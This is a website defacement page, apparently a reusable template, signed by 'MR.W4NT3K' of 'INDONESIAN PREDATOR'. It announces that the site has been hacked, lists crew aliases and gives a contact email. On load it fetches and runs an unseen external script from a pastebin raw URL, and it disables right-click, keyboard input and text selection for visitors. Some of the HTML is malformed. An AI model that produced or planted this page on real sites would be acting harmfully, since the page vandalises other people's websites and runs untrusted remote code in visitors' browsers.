<!-- cie yg mao recode:V -->
<!-- ketahuan ye mao recode:v -->
	<html>
	<head>
	<link rel="icon" type="image/jpg" href="https://i.ibb.co/3BQKgQ6/20200316-225711.png">
	<meta name="description" content="MR.W4NT3K">
	<meta content='MR.W4NT3K' property='og:title'/>
	<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
	<script>
alert('INDONESIAN PREDATOR)
</script>
<span id="sec">
<br> <br> <br> <br> <div class= animated flat > <center> <iframe scrolling= no  frameborder= no  clocktype= html5  style= Fredericka the Great:hidden;border:0;margin:0;padding:0;width:570px;height:75px; src= https://www.clocklink.com/html5embed.php?clock=036&timezone=ICT&color=black&size=570&Title=&Message=&Target=&From=2019,1,1,0,0,0&Color=black ></iframe> </center> </div>
<div id="foter" class="foter" style="position: fixed; top: 75px; left: -235px; width: 600px; padding: 10px; font-size: 16px; text-align: center; color: rgb(255, 255, 255); font-family: &#39;trebuchet ms&#39;, verdana, arial, sans-serif;transform: rotate(-45deg);transform-origin: 50% 0px;-o-transform: rotate(-45deg); -o-transform-origin: 50% 0px;-moz-transform: rotate(-45deg); -moz-transform-origin: 50% 0px; -webkit-transform: rotate(-45deg); -webkit-transform-origin: 50% 0px; background-color: rgb(0, 0, 0); border: 1px solid rgb(170, 170, 170); z-index: 9999; opacity: 0.5;"><b>
<font face="trade Winds" size="4"><marquee direction="right" scrollamount="6" width="50%">-+|[MY NAME IS MR.W4NT3K]|+-</marquee></font></b></div></span>
<pre>
</pre>
<!DOCTYPE html>
<html lang="en" >
<style type="text/css">
<style>
@import "https://fonts.googleapis.com/css?family=Iceland";

html, body {
  background-color: #000;
  text-align: center;
  padding: 0%;
}

.content {
  color: #000; 
  font-family:  Iceland , sans-serif;
  font-size: 40px;
  font-weight: bold;
  color: #FFF;
  position: relative;
}
@keyframes glitch-anim-1 {
  0% {
    clip: rect(65px, 1084px, 115px, 0);
  }
  5.8823529412% {
    clip: rect(87px, 1084px, 28px, 0);
  }
  11.7647058824% {
    clip: rect(92px, 1084px, 102px, 0);
  }
  17.6470588235% {
    clip: rect(63px, 1084px, 65px, 0);
  }
  23.5294117647% {
    clip: rect(48px, 1084px, 64px, 0);
  }
  29.4117647059% {
    clip: rect(11px, 1084px, 90px, 0);
  }
  35.2941176471% {
    clip: rect(22px, 1084px, 51px, 0);
  }
  41.1764705882% {
    clip: rect(109px, 1084px, 111px, 0);
  }
  47.0588235294% {
    clip: rect(56px, 1084px, 73px, 0);
  }
  52.9411764706% {
    clip: rect(45px, 1084px, 19px, 0);
  }
  58.8235294118% {
    clip: rect(5px, 1084px, 3px, 0);
  }
  64.7058823529% {
    clip: rect(93px, 1084px, 33px, 0);
  }
  70.5882352941% {
    clip: rect(50px, 1084px, 107px, 0);
  }
  76.4705882353% {
    clip: rect(30px, 1084px, 106px, 0);
  }
  82.3529411765% {
    clip: rect(36px, 1084px, 3px, 0);
  }
  88.2352941176% {
    clip: rect(113px, 1084px, 56px, 0);
  }
  94.1176470588% {
    clip: rect(19px, 1084px, 26px, 0);
  }
  100% {
    clip: rect(19px, 1084px, 69px, 0);
  }
}
@keyframes glitch-anim-2 {
  0% {
    clip: rect(103px, 1084px, 91px, 0);
  }
  5.8823529412% {
    clip: rect(51px, 1084px, 83px, 0);
  }
  11.7647058824% {
    clip: rect(97px, 1084px, 36px, 0);
  }
  17.6470588235% {
    clip: rect(36px, 1084px, 115px, 0);
  }
  23.5294117647% {
    clip: rect(67px, 1084px, 22px, 0);
  }
  29.4117647059% {
    clip: rect(69px, 1084px, 49px, 0);
  }
  35.2941176471% {
    clip: rect(96px, 1084px, 39px, 0);
  }
  41.1764705882% {
    clip: rect(90px, 1084px, 19px, 0);
  }
  47.0588235294% {
    clip: rect(2px, 1084px, 19px, 0);
  }
  52.9411764706% {
    clip: rect(70px, 1084px, 90px, 0);
  }
  58.8235294118% {
    clip: rect(49px, 1084px, 102px, 0);
  }
  64.7058823529% {
    clip: rect(98px, 1084px, 3px, 0);
  }
  70.5882352941% {
    clip: rect(105px, 1084px, 48px, 0);
  }
  76.4705882353% {
    clip: rect(85px, 1084px, 63px, 0);
  }
  82.3529411765% {
    clip: rect(1px, 1084px, 5px, 0);
  }
  88.2352941176% {
    clip: rect(33px, 1084px, 18px, 0);
  }
  94.1176470588% {
    clip: rect(82px, 1084px, 20px, 0);
  }
  100% {
    clip: rect(115px, 1084px, 66px, 0);
  }
}
.content:before, .content:after {
  content: attr(data-text);
  position: absolute;
  top: 0;
  left: 0;
  width: 100%;
  background: black;
  clip: rect(0, 0, 0, 0);
}
.content:after {
  left: 2px;
  text-shadow: -1px 0 black;
  animation: glitch-anim-1 2s infinite linear alternate-reverse;
}
.content:before {
  left: -2px;
  text-shadow: 2px 0 white;
  animation: glitch-anim-2 3s infinite linear alternate-reverse;
}

</style>


<center>
	<br><br>
  <div class= "content" data-text="INDONESIAN PREDATOR">- Hacked By MR.W4NT3K -<br></div>
  <center>
   <img src="https://i.ibb.co/3BQKgQ6/20200316-225711.png" class="rotate">
   <h1><font color="BLUE">Hacked by</font> <font color="white">MR.W4NT3K</font></h1>
   <font color=WHITE size=2 face=courier new>[ <font color=#a3a2a1> tnbadut51@gmail.com<font color=WHITE> ]</font></center>
   <font color=WHITE size=4 face=courier new> TERIMA KASIH KARENA KAU TELAH HADIR DI HIDUPKU:) DAN TERIMA KASIH KAU UDAH MAU BERTAHAN SAMA AKU:)</font><center><font color=red size=4 face=courier new></font><center><font color=WHITE size=2 face=courier new> INDONESIAN PREDATOR  </font><center>
   <font size=4 color=WHITE> <center><font color="White" size="5">My Family :<marquee width="60%">~ INDONESIAN PREDATOR|MR.W4NT3K|./DarkSkull7|./tn.koclok}{ploit|MR.KINGBEE|./br0k3n`h34rt|MBET502|MASTER_Z|MR.057|./Mr.Agency~</font></marquee>
   <font size=4 color=WHITE><center><font color="White" size="5px">My Friend:<marquee width="60%"> ~ INDONESIAN PREDATOR|MR.W4NT3K|MR.BADUT|./DarkSkull7|./tn.koclok}{ploit|MR.KINGBEE|./br0k3n`h34rt|MBET502|MASTER_Z|MR.057|./Mr.Agency~ </font></marquee>
   <h1><font size="2" color="blue">@copyright 2k18</font><font size="2" color="white"> INDONESIAN PREDATOR</font></h1><font color="white"><br></font>
   <br><br><br><br>
</center>
<style type="text/css">
body 	{
text-align: center;
margin-top: 10%;
margin-bottom: 10%;
background-color: black;
}
.social {
text-decoration: none; 
padding: 8px; 
font-size: 55px; 
color: #fff; 
left: 50%; 
width: 100%; 
text-align: center; 
}
.social a { 
text-decoration: none; 
padding: 8px; 
font-size: 55px; 
color: #fff; 
}
.b1 {
border-top: 5px solid white;
width:100%;
}
.rotate	{
animation-name: rotate ;
animation-duration: 5s;
animation-play-state: running;
animation-timing-function: linear;
animation-iteration-count: infinite;
opacity: 1.0;filter: alpha(opacity=50);}

img	{width: 200px; height: 200px;}
img:hover {opacity: 1.0;filter: alpha(opacity=100);}

@keyframes rotate{
10% {transform:rotateY(36deg)}
20% {transform:rotateY(72deg)}
30% {transform:rotateY(108deg)}
40% {transform:rotateY(144deg)}
50% {transform:rotateY(180deg)}
60% {transform:rotateY(216deg)}
70% {transform:rotateY(252deg)}
80% {transform:rotateY(288deg)}
90% {transform:rotateY(324deg)}
100% {transform:rotateY(360deg)}
}
a   {
  color: #fff;
  text-decoration: none;
}
a:hover   {
  color: white;
  text-decoration: none;
}
p {
  position: relative;
  font-weight: bold;
  font-family:  Ubuntu , sans-serif;
  font-size: 25px;
  overflow: hidden;
  background: linear-gradient(90deg, #000, #fff, #000);
  background-repeat: no-repeat;
  background-size: 80%;
  animation: animate 3s linear infinite;
  -webkit-background-clip: text;
  -webkit-text-fill-color: rgba(255, 255, 255, 0);
}

@keyframes animate {
  0% {
    background-position: -500%;
  }
  100% {
    background-position: 500%;
  }
}
</style>
</body>
<body>
<style type="text/css">
body 	{
text-align: center;
margin-top: 10%;
margin-bottom: 10%;
background-color: black;
}
.social {
text-decoration: none; 
padding: 8px; 
font-size: 55px; 
color: #fff; 
left: 50%; 
width: 100%; 
text-align: center; 
}
.social a { 
text-decoration: none; 
padding: 8px; 
font-size: 55px; 
color: #fff; 
}
.b1 {
border-top: 5px solid white;
width:100%;
}
.rotate	{
animation-name: rotate ;
animation-duration: 5s;
animation-play-state: running;
animation-timing-function: linear;
animation-iteration-count: infinite;
opacity: 1.0;filter: alpha(opacity=50);}

img	{width: 200px; height: 200px;}
img:hover {opacity: 1.0;filter: alpha(opacity=100);}

@keyframes rotate{
10% {transform:rotateY(36deg)}
20% {transform:rotateY(72deg)}
30% {transform:rotateY(108deg)}
40% {transform:rotateY(144deg)}
50% {transform:rotateY(180deg)}
60% {transform:rotateY(216deg)}
70% {transform:rotateY(252deg)}
80% {transform:rotateY(288deg)}
90% {transform:rotateY(324deg)}
100% {transform:rotateY(360deg)}
}
a   {
  color: #fff;
  text-decoration: none;
}
a:hover   {
  color: white;
  text-decoration: none;
}
p {
  position: relative;
  font-weight: bold;
  font-family:  Ubuntu , sans-serif;
  font-size: 25px;
  overflow: hidden;
  background: linear-gradient(90deg, #000, #fff, #000);
  background-repeat: no-repeat;
  background-size: 80%;
  animation: animate 3s linear infinite;
  -webkit-background-clip: text;
  -webkit-text-fill-color: rgba(255, 255, 255, 0);
}

@keyframes animate {
  0% {
    background-position: -500%;
  }
  100% {
    background-position: 500%;
  }
}
</style>
</body>
 <center>
 	<br>
 	<br>
<body>
 <body oncontextmenu= return false;  onkeydown= return false;  onmousedown= return false;  ondragstart= return false  onselectstart= return false  style= -moz-user-select: none; cursor: default; >
      </center>
</body>
<script type="text/javascript" src="https://pastebin.com/raw/ynL2hpMe"> </script> </head> 
 <style type="text/css">
 @import url("https://fonts.googleapis.com/css?family=Iceland|Shadows+Into+Light&display=swap");
 
 i{
 margin:10px;
 color: red;
 }
 a:link{
 color:#000;
 }
 h1{
 color: #000;
 text-decoration: none;
 border-radius:0px;
 border:0px;
 font-family: 'Shadows Into Light', cursive;
 font-size:50px;
 margin:0px;
 padding:0px;
 animation:a 0.5s linear infinite;
 }
 h1{     color: #000;     text-decoration: none;     border-radius:0px;     border:0px;     font-family:  Shadows Into Light , cursive;     font-size:50px;     margin:0px;     padding:0px;     animation:lamerkaratan 0.5s linear infinite; }    marquee{ width:100%; } @keyframes lamerkaratan{ 2%{color:#fff;} 3%{transform:translate(2px,-10px) skewX(3240deg);} 5%{transform:translate(0px,0px) skewX(0deg);} 2% , 54%{transform:translateX(0px) skew(0deg);} 55%{transform:translate(-2px,6px) skew(-5530deg);} 56%{transform:translate(0px,0px) skew(0deg);} 57%{transform:translate(4px,-10px) skew(-70deg);} 58%{transform:translate(0px,0px) skew(0deg);} 62%{transform:translate(0px,20px) skew(0deg);} 63%{transform:translate(4px,-2px) skew(0deg);} 90%{transform:translate(1px,3px); skew(-230deg);} 95%{transform:translate(-7px,2px); skew(-120deg);} 100%{transform:translate(0px,0px) skew(0deg);} </style>
 <SCRIPT> 
 var width=document.body.clientWidth;
 var height=document.body.clientHeight;
 
 function doClickText(who,type,step,timeOut) {
 document.getElementById(who).style.display="none";
 if(type==0) {
 reveal('revealDiv1',step,timeOut,0);
 reveal('revealDiv2',step,timeOut,1);}
 if(type==1) {
 reveal('revealDiv1',step,timeOut,2);
 reveal('revealDiv2',step,timeOut,3);}}
 function reveal(who,step,timeOut,type) {
 if(type==0)
 var where="top";
 if(type==1)
 var where="bottom";
 if(type==2)
 var where="left";
 if(type==3)
 var where="right";
 eval('var temp=document.getElementById(who).style.'+where);
 temp=parseInt(temp);
 if(type==0||type==1)
 var checkWith=height/2;
 if(type==2||type==3)
 var checkWith=width/2;
 if(-temp<checkWith) {
 
 temp-=step;
 
 eval('document.getElementById(who).style.'+where+'=temp;');
 
 setTimeout("reveal('"+who+"',"+step+",'"+timeOut+"',"+type+")", timeOut);}
 
 else {
 
 document.getElementById(who).style.display="none";
 
 document.body.scroll="yes";}}
 
 function initReveal(type,div1bg,div2bg,div1bw,div2bw,div1bc,div2bc,step,timeOut,click) {
 
 if(type==0) {
 
 var bWhere1="border-bottom";
 
 var bWhere2="border-top";
 
 var putZero1="top:0px; left:0px";
 
 var putZero2="bottom:0px; left:0px";
 
 document.write('<div id="revealDiv1" style="z-index:100; display:block; position:absolute; '+putZero1+'; background:'+div1bg+' ; width:'+(width)+'; height:'+(height/2)+'; '+bWhere1+':'+div1bc+' solid '+div1bw+'px"></div>');
 document.write('<div id="revealDiv2" style="z-index:100; display:block; position:absolute; '+putZero2+'; background:'+div2bg+' ; width:'+(width)+'; height:'+(height/2)+'; '+bWhere2+':'+div2bc+' solid '+div2bw+'px"></div>');
 if(!click) {
 reveal('revealDiv1',step,timeOut,0);
 reveal('revealDiv2',step,timeOut,1);}
 
 else {
 clickText(type,step,timeOut);}}
 
 if(type==1) {
 var bWhere1="border-right";
 var bWhere2="border-left";
 var putZero1="top:0px; left:0px";
 var putZero2="top:0px; right:0px";
 document.write('<div id="revealDiv1" style="z-index:100; display:block; position:absolute; '+putZero1+'; background:'+div1bg+' ; width:'+(width/2)+'; height:'+(height)+'; '+bWhere1+':'+div1bc+' solid '+div1bw+'px"></div>');
 document.write('<div id="revealDiv2" style="z-index:100; display:block; position:absolute; '+putZero2+'; background:'+div2bg+' ; width:'+(width/2)+'; height:'+(height)+'; '+bWhere2+':'+div2bc+' solid '+div2bw+'px"></div>');
 if(!click) {
 reveal('revealDiv1',step,timeOut,2);
 reveal('revealDiv2',step,timeOut,3);}
 else {
 clickText(type,step,timeOut);}}
 function clickText(type,step,timeOut) {
 document.write('<div id="clickText" style="z-index:101; display:block; position:absolute; top:'+(height/2-clickh/2-clickb)+'; left:'+(width/2-clickw/2-clickb)+'"><table style="border:'+clickc+' solid '+clickb+'px; background:'+clickbg+' ;width:'+clickw+'px; height:'+clickh+'; '+clickFont+'; cursor:hand; cursor:pointer" onClick="doClickText(\'clickText\','+type+','+step+','+timeOut+')"><tr><td align="middle">'+clickt+'</td></tr></table></div>');}}
 </SCRIPT>
 <SCRIPT> 
 var clickw=270;
 var clickh=20;
 var clickb=2;
 var clickc="#FFFFFF";
 var clickbg="black"; // Background color
 var clickt="-=[ <blink>sorry your site i'm hacked:V</blink>  ]=-"; // Text to display
 var clickFont="font-family:Tahoma,arial,helvetica; font-size:10pt; font-weight:bold; color:white"; // The font style of the text
 new initReveal(0,'black','black',1,1,'lime','lime',3,10,true);
 </SCRIPT>
 <style type="text/css">
body, a:hover {cursor: url 
</style>
<a href="https://www.facebook.com/Hakamaha Gans></a>


<style type="text/css">

#outerCircleText {

font-style: italic;
font-weight: bold;
font-family: 'comic sans ms', verdana, arial;
color: white;

position: absolute;top: 0;left: 0;z-index: 3000;cursor: default;}
#outerCircleText div {position: relative;}
#outerCircleText div div {position: absolute;top: 0;left: 0;text-align: center;}

</style>
<script type="text/javascript">


;(function(){


var msg = "<<<<MR.W4NT3K >>>>";

var size = 24;


var circleY = 0.75; var circleX = 2;

var letter_spacing = 5;

var diameter = 10;


var rotation = 0.4;

var speed = 0.3;



if (!window.addEventListener && !window.attachEvent || !document.createElement) return;

msg = msg.split('');
var n = msg.length - 1, a = Math.round(size * diameter * 0.208333), currStep = 20,
ymouse = a * circleY + 20, xmouse = a * circleX + 20, y = [], x = [], Y = [], X = [],
o = document.createElement('div'), oi = document.createElement('div'),
b = document.compatMode && document.compatMode != "BackCompat"? document.documentElement : document.body,

mouse = function(e){
 e = e || window.event;
 ymouse = !isNaN(e.pageY)? e.pageY : e.clientY; // y-position
 xmouse = !isNaN(e.pageX)? e.pageX : e.clientX; // x-position
},

makecircle = function(){ // rotation/positioning
 if(init.nopy){
  o.style.top = (b || document.body).scrollTop + 'px';
  o.style.left = (b || document.body).scrollLeft + 'px';
 };
 currStep -= rotation;
 for (var d, i = n; i > -1; --i){ // makes the circle
  d = document.getElementById('iemsg' + i).style;
  d.top = Math.round(y[i] + a * Math.sin((currStep + i) / letter_spacing) * circleY - 15) + 'px';
  d.left = Math.round(x[i] + a * Math.cos((currStep + i) / letter_spacing) * circleX) + 'px';
 };
},

drag = function(){ // makes the resistance
 y[0] = Y[0] += (ymouse - Y[0]) * speed;
 x[0] = X[0] += (xmouse - 20 - X[0]) * speed;
 for (var i = n; i > 0; --i){
  y[i] = Y[i] += (y[i-1] - Y[i]) * speed;
  x[i] = X[i] += (x[i-1] - X[i]) * speed;
 };
 makecircle();
},

init = function(){ 
 if(!isNaN(window.pageYOffset)){
  ymouse += window.pageYOffset;
  xmouse += window.pageXOffset;
 } else init.nopy = true;
 for (var d, i = n; i > -1; --i){
  d = document.createElement('div'); d.id = 'iemsg' + i;
  d.style.height = d.style.width = a + 'px';
  d.appendChild(document.createTextNode(msg[i]));
  oi.appendChild(d); y[i] = x[i] = Y[i] = X[i] = 0;
 };
 o.appendChild(oi); document.body.appendChild(o);
 setInterval(drag, 25);
},

ascroll = function(){
 ymouse += window.pageYOffset;
 xmouse += window.pageXOffset;
 window.removeEventListener('scroll', ascroll, false);
};

o.id = 'outerCircleText'; o.style.fontSize = size + 'px';

if (window.addEventListener){
 window.addEventListener('load', init, false);

 document.addEventListener('mouseover', mouse, false);
 document.addEventListener('mousemove', mouse, false);
  if (/Apple/.test(navigator.vendor))
   window.addEventListener('scroll', ascroll, false);
}
else if (window.attachEvent){
 window.attachEvent('onload', init);
 document.attachEvent('onmousemove', mouse);
};

})();

</script>
